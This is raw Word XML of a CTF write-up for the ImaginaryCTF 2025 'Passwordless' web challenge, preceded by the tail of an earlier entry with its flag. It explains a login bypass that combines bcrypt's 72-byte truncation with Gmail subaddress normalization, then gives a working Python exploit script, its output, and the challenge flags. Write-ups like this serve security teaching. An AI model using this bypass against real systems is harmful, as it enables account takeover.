      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD957D5" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>ictf{mayb3_d0nt_m4ke_th3_sca1ar_a_f4ctor_0f_the_ord3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840F10D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="58151CE9" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="35F2E9A8" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="266C7281" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="02500D5B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="7A9364CF" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="2ED5859D" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="7E25F674" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="137DA8C2" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="16B4822B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="6222469E" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="7AD8F5DA" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="2BFB9180" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="240C4F7E" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="7DB86DBE" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="510FDC14" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="480558B2" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="7F446D1B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="3B8F9D64" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="05823092" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="58F9D181" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="78550C18" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="1BE35305" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRDefault="00CB4EC3"/>
    <w:p w14:paraId="6BC9BC11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lastRenderedPageBreak/>
        <w:t>ImaginaryCTF 2025 – Passwordless (Web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540CDF7" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> Passwordless</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> ictf{8ee2ebc4085927c0dc85f07303354a05}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A44E4" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="3FAD1E37">
          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA18F3B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Challenge Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2300B150" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>We are given a simple Express.js application with login/registration.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
        <w:t>The key routes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F0CAC" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">/register → creates a new user with a random password (email + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>randomHex(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>16))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB60EAF" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">/session → login (checks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>bcrypt.compareSync</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(password, hash))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E0E23" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>/dashboard → restricted page that reveals the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36514841" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">&lt;span id="flag"&gt;&lt;%- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>process.env.FLAG</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> %&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674DC2E6" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>At first glance, there’s no way to get the random password because the server never emails it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3AD0DD" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="6F6CF0B4">
          <v:rect id="_x0000_i1121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B89EC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Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C970231" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>The issue lies in how the initial password is generated and stored:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783BFB5F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">const initialPassword = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>req.body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">.email + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>crypto.randomBytes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(16</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>).toString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>('hex')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027692B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>bcrypt.hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(initialPassword, 10, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA619F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">But bcrypt has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>72-byte input limit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>: anything after 72 bytes is ignored.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
        <w:t>That means if we make our email very long, the random suffix will be beyond byte 72 and completely discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A800A26" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>So, effectively, the stored hash only depends on the first 72 bytes of the email string we control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12112B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="415B2998">
          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="692995C1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Bypassing Normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63061F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>The server normalizes email addresses with normalize-email before storing and logging in.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
        <w:t>That means we can’t just use a giant raw email — it must normalize down to something valid and ≤64 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EEBA84" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">Luckily, Gmail addresses support </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subaddressing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> (+tag).</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:br/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176191F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Raw input: a+AAAAAA...@gmail.com (hundreds of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>As</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE7276" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Normalized form: a@gmail.com (tag stripped, under 64 chars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0169D531" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Thus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542459E1" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">On registration, the app stores a user a@gmail.com with a bcrypt hash of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first 72 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve"> of our raw email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11990138" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>On login, we just supply a@gmail.com and use that 72-byte prefix as the password → bcrypt matches → we are authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D07AF7" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="61577DF7">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A235C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Exploit Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB3ACB" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Here’s the Python one-shot exploit we used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B4453" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>import requests, re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41492867" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="2E9FC1D3" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>BASE = "http://passwordless.chal.imaginaryctf.org"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB7D4A" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">s = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>requests.Session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C625E38" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="04C55820" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t># 1) Craft emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D26592" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>base_local = "a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F5062" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>tag = "A" * 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B77DF" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>domain = "gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B028FA9" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>raw_email = f"{base_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>local}+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>{tag}@{domain}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E2494" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>norm_email = f"{base_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>local}@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>{domain}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE27F8" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="11B025A5" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t># 2) First 72 bytes = effective bcrypt password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0E889" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>pwd72 = raw_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>email[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>:72]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11058F16" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="1D4F0521" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t># 3) Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B84770F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>s.post</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(f"{BASE}/user", data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>"email": raw_email})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D883DF" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="4447BA95" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t># 4) Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDC54B" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:lastRenderedPageBreak/>
        <w:t>s.post</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(f"{BASE}/session", data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>"email": norm_email, "password": pwd72})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07167596" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3"/>
    <w:p w14:paraId="03A9BCD5" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t># 5) Fetch dashboard for flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDF9D8" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>r = s.get(f"{BASE}/dashboard")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10268B5E" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">m = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(r'&lt;span id="flag"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(.*?)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>/span&gt;', r.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD5BF5" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t xml:space="preserve">"FLAG:", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>m.group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D926E" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="74884D16">
          <v:rect id="_x0000_i1124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14676A4B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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E657B0A" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Running the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E0685" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>[*] Register status: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD1EFD" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>[*] Login status: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AC7B9" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>[*] Dashboard status: 200</w:t>
      </w:r>
    </w:p>
